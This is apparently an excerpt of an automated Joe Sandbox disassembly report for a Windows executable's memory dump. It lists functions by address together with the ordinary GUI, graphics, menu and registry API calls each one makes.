Part of subcall function 00454DE0: GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00454E1D
Part of subcall function 00454DE0: SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00454E36
Part of subcall function 00454DE0: SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00454E4D
Part of subcall function 00454DE0: SetCursor.USER32(00000000), ref: 00454E5F

Part of subcall function 0044DD8C: GetCurrentThreadId.KERNEL32(0044DD3C,00000000,00000000,0044DDF8,?,00000000,0044DE2F), ref: 0044DDDB
Part of subcall function 0044DD8C: EnumThreadWindows.USER32(00000000,0044DD3C,00000000), ref: 0044DDE1

SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00453AAD
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00453B14
GetActiveWindow.USER32 ref: 00453B23

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043B768, Relevance: 12.1, APIs: 8, Instructions: 123

APIs

SaveDC.GDI32 ref: 0043B77E

Part of subcall function 004358CC: GetWindowOrgEx.GDI32(?), ref: 004358DA
Part of subcall function 004358CC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004358F0

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B79F
GetWindowLongA.USER32(00000000,000000EC), ref: 0043B7B5
GetWindowLongA.USER32(00000000,000000F0), ref: 0043B7D7

Part of subcall function 0043B768: SetRect.USER32(?,00000000,00000000,?,?), ref: 0043B803
Part of subcall function 0043B768: DrawEdge.USER32(?,?,?,00000000), ref: 0043B812
Part of subcall function 0043B768: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B837

RestoreDC.GDI32(?,?), ref: 0043B8A8

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00420380, Relevance: 12.1, APIs: 8, Instructions: 79

APIs

GetDC.USER32(00000000), ref: 004203AE
GetDeviceCaps.GDI32(?,00000068), ref: 004203CA
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004203E9
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0042040D
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0042042B
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042043F
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042045F
ReleaseDC.USER32(00000000,?), ref: 00420477

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0044AB04, Relevance: 10.9, APIs: 7, Instructions: 405

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 0044B019

Part of subcall function 00449EB0: SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00449F36
Part of subcall function 00449EB0: DrawMenuBar.USER32(00000000), ref: 00449F47

GetSubMenu.USER32(?,?), ref: 0044AC00

Part of subcall function 0041F3B8: RtlInitializeCriticalSection.KERNEL32(00422DBC,00422D84,?,00000001,00422F1A,?,?,?,00424185,?,?,00423FA5,?,0000000E,00000000,?), ref: 0041F3D8

SaveDC.GDI32(?), ref: 0044ADD3
RestoreDC.GDI32(?,?), ref: 0044AE47
GetWindowDC.USER32(?), ref: 0044AEC1
SaveDC.GDI32(?), ref: 0044AEF8
RestoreDC.GDI32(?,?), ref: 0044AF65

Part of subcall function 0044A6F4: GetMenuItemCount.USER32(?), ref: 0044A720
Part of subcall function 0044A6F4: GetMenuState.USER32(?,00000000,00000400), ref: 0044A740
Part of subcall function 0044A6F4: GetMenuState.USER32(?,00000000,00000400), ref: 0044A7D7

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00446B64, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187

APIs

GetVersion.KERNEL32(00000000,00446DBF), ref: 00446C00
InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00446D10
InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00446D9C

Part of subcall function 00447068: CreatePopupMenu.USER32(?,00446D7B,00000000,00000000,00446DBF), ref: 00447083
Part of subcall function 00447068: CreateMenu.USER32 ref: 0044708D

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00446D83

Strings

?, xrefs: 00446C1B
,, xrefs: 00446C14

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00420970, Relevance: 10.7, APIs: 7, Instructions: 166

APIs

Part of subcall function 00420628: GetDC.USER32(00000000), ref: 00420672
Part of subcall function 00420628: CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 004206B9
Part of subcall function 00420628: DeleteObject.GDI32(?), ref: 004206F4

GetObjectA.GDI32(?,00000018,?), ref: 00420A62
GetObjectA.GDI32(?,00000018,?), ref: 00420A71
GetBitmapBits.GDI32(?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?,?), ref: 00420AC2
GetBitmapBits.GDI32(?,?,?,?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?), ref: 00420AD0
DeleteObject.GDI32(?), ref: 00420AD9
DeleteObject.GDI32(?), ref: 00420AE2
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420B04

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043EBD8, Relevance: 10.7, APIs: 7, Instructions: 151

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010), ref: 0043ECBD
GetTickCount.KERNEL32(00000000,000000FF,?,?,?,?,00000010,00000000,0043ED9F), ref: 0043ECC2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043ECFD
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043ED15

Part of subcall function 00441E2C: GetCursorPos.USER32(?), ref: 00441E30

AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043ED5B
ShowWindow.USER32(00000000,00000004), ref: 0043ED6C
GetTickCount.KERNEL32(0043EDA6), ref: 0043ED86

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00454B30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125

APIs

GetKeyboardLayoutList.USER32(00000040,?), ref: 00454B86
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00454BEE
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00454C97,?,80000002,00000000), ref: 00454C28
RegCloseKey.ADVAPI32(?,00454C9E,00000000,?,00000100,00000000,00454C97,?,80000002,00000000), ref: 00454C91

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00454BD8
layout text, xrefs: 00454C1F

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00422B38, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00422B8A
MulDiv.KERNEL32(?,?,000009EC,?), ref: 00422BA1
GetDC.USER32(00000000), ref: 00422BB8
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?), ref: 00422BDC
GetWinMetaFileBits.GDI32(?,?,?,00000008,?), ref: 00422C0F

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Strings

`, xrefs: 00422B70

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00454E70, Relevance: 10.6, APIs: 7, Instructions: 89

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454EC4
CreateFontIndirectA.GDI32(?), ref: 00454ED1
GetStockObject.GDI32(0000000D), ref: 00454EE7
SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454F10
CreateFontIndirectA.GDI32(?), ref: 00454F20
CreateFontIndirectA.GDI32(?), ref: 00454F39

Part of subcall function 0041ED3C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041ED49

GetStockObject.GDI32(0000000D), ref: 00454F5F

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043EEE4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73

APIs

6D37908C.COMCTL32(00000000), ref: 0043EF16

Part of subcall function 004262C8: 6D3D6ED3.COMCTL32(*PC,000000FF,00000000,0043EF46,00000000,0043EFA4,?,00000000), ref: 004262CC

6D3D6C74.COMCTL32(*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF6A
6D3D6CC8.COMCTL32(00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF75
6D3D6C74.COMCTL32(*PC,00000001,?,0043F00D,00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF88
6D377CF1.COMCTL32(*PC,0043EFAB,0043F00D,00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF9E

Strings

*PC, xrefs: 0043EF3E, 0043EF58, 0043EF66, 0043EF84, 0043EF9A, 0043EF69, 0043EF87, 0043EF9D

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00426790, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004267E8
GetSystemMetrics.USER32(00000000), ref: 004267FD
GetSystemMetrics.USER32(00000001), ref: 00426808
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426832

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

DISPLAY, xrefs: 00426829
GetMonitorInfoA, xrefs: 004267A8

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004231BC, Relevance: 10.6, APIs: 7, Instructions: 66

APIs

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042060E

GetDC.USER32(00000000), ref: 004231FA
CreateCompatibleDC.GDI32(?), ref: 00423206
SelectObject.GDI32(?), ref: 00423213
SetDIBColorTable.GDI32(?,00000000,00000000,?), ref: 00423237
SelectObject.GDI32(?,?), ref: 00423251
DeleteDC.GDI32(?), ref: 0042325A
ReleaseDC.USER32(00000000,?), ref: 00423265

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00454DE0, Relevance: 10.6, APIs: 7, Instructions: 57

APIs

GetCursorPos.USER32 ref: 00454DFB
WindowFromPoint.USER32(?,?), ref: 00454E08
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454E16
GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00454E1D
SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00454E36
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00454E4D
SetCursor.USER32(00000000), ref: 00454E5F

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004505E8, Relevance: 9.3, APIs: 6, Instructions: 284

APIs

SetFocus.USER32(00000000), ref: 004506A3

Part of subcall function 00450E48: SendMessageA.USER32(00000000,00000229,00000000,00000000), ref: 00450E6F

Part of subcall function 0041F3B8: RtlInitializeCriticalSection.KERNEL32(00422DBC,00422D84,?,00000001,00422F1A,?,?,?,00424185,?,?,00423FA5,?,0000000E,00000000,?), ref: 0041F3D8

SaveDC.GDI32(?), ref: 004507CA
RestoreDC.GDI32(?,?), ref: 0045083B
GetWindowDC.USER32(00000000), ref: 004508A7
SaveDC.GDI32(?), ref: 004508DE
RestoreDC.GDI32(?,?), ref: 00450942

Part of subcall function 0043B13C: DefWindowProcA.USER32(00000000,?,?,?), ref: 0043B243
Part of subcall function 0043B13C: GetCapture.USER32 ref: 0043B260

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0040C14C, Relevance: 9.1, APIs: 6, Instructions: 139

APIs

767E48F1.OLEAUT32(?), ref: 0040C17C
767EFFDA.OLEAUT32(?,00000001,?), ref: 0040C1E1
767EFF8E.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040C203
767F00CA.OLEAUT32(0000000C,?,?), ref: 0040C242

Part of subcall function 0040C00C: 767E3EAE.OLEAUT32(?,00000100,?,?,0040C9DE), ref: 0040C05B

767F0035.OLEAUT32(?,?,?,0000000C,?,?), ref: 0040C2AD
767F0035.OLEAUT32(00000000,?,?,?,?,?,0000000C,?,?), ref: 0040C2CC

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00420880, Relevance: 9.1, APIs: 6, Instructions: 84

APIs

GetSystemMetrics.USER32(0000000B), ref: 004208CE
GetSystemMetrics.USER32(0000000C), ref: 004208DA
GetDC.USER32(00000000), ref: 004208F6
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042091D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042092A
ReleaseDC.USER32(00000000,00000000), ref: 00420963

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00420CF0, Relevance: 9.1, APIs: 6, Instructions: 65

APIs

Part of subcall function 00420BA0: GetObjectA.GDI32(?,00000054), ref: 00420BB4

CreateCompatibleDC.GDI32(00000000), ref: 00420D12
SelectPalette.GDI32(?,?,00000000), ref: 00420D33
RealizePalette.GDI32(?), ref: 00420D3F
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00420D56
SelectPalette.GDI32(?,00000000,00000000), ref: 00420D7E
DeleteDC.GDI32(?), ref: 00420D87

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00433DBC, Relevance: 9.1, APIs: 6, Instructions: 60

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00433DE4
GetWindowLongA.USER32(?,000000F0), ref: 00433DEF
GetWindowLongA.USER32(?,000000F4), ref: 00433E01
SetWindowLongA.USER32(?,000000F4,?), ref: 00433E14
SetPropA.USER32(?,00000000,00000000), ref: 00433E2B
SetPropA.USER32(?,00000000,00000000), ref: 00433E42

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00425E92, Relevance: 9.1, APIs: 6, Instructions: 58

APIs

Part of subcall function 00425998: GetDC.USER32(00000000), ref: 0042599B
Part of subcall function 00425998: GetDeviceCaps.GDI32(00000000,0000005A), ref: 004259A5
Part of subcall function 00425998: ReleaseDC.USER32(00000000,00000000), ref: 004259B2

RtlInitializeCriticalSection.KERNEL32(00464A44), ref: 00425EAB
RtlInitializeCriticalSection.KERNEL32(00464A5C,00464A44), ref: 00425EB5
GetStockObject.GDI32(00000007), ref: 00425EBC
GetStockObject.GDI32(00000005), ref: 00425EC8
GetStockObject.GDI32(0000000D), ref: 00425ED4
LoadIconA.USER32(00000000,00007F00), ref: 00425EE5

Part of subcall function 00425A14: MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21
Part of subcall function 00425A14: MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Part of subcall function 0041DDD4: RtlInitializeCriticalSection.KERNEL32(?), ref: 0041DDEE

Part of subcall function 00425AE0: RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6

Part of subcall function 00413F7C: RtlInitializeCriticalSection.KERNEL32(0041177C,?,?,00442409,00000000,00000000,?,?,00000000,004424B0), ref: 00413F9B

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00420530, Relevance: 9.1, APIs: 6, Instructions: 55

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00420549
SelectObject.GDI32(00000000,00000000), ref: 00420552
GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
SelectObject.GDI32(00000000,00000000), ref: 00420572
DeleteDC.GDI32(00000000), ref: 00420578
CreatePalette.GDI32 ref: 004205BE

Part of subcall function 00420498: GetDC.USER32(00000000), ref: 004204B0
Part of subcall function 00420498: GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
Part of subcall function 00420498: GetPaletteEntries.GDI32(0B080891,00000000,00000008,?), ref: 004204E4
Part of subcall function 00420498: GetPaletteEntries.GDI32(0B080891,00000008,00000008,?), ref: 004204FC
Part of subcall function 00420498: ReleaseDC.USER32(00000000,?), ref: 00420518

Part of subcall function 00420328: GetSystemInfo.KERNEL32(?), ref: 00420338

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0041FC14, Relevance: 9.0, APIs: 6, Instructions: 43

APIs

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

UnrealizeObject.GDI32(00000000), ref: 0041FC20
SelectObject.GDI32(?,00000000), ref: 0041FC32
SetBkColor.GDI32(?,00000000), ref: 0041FC55
SetBkMode.GDI32(?,00000002), ref: 0041FC60

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

SetBkColor.GDI32(?,00000000), ref: 0041FC7B
SetBkMode.GDI32(?,00000001), ref: 0041FC86

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00457AFC, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 289

APIs

ClientToScreen.USER32(?,?), ref: 00457C28
OffsetRect.USER32(?,?,?), ref: 00457C3F
OffsetRect.USER32(?,?,?), ref: 00457D6F

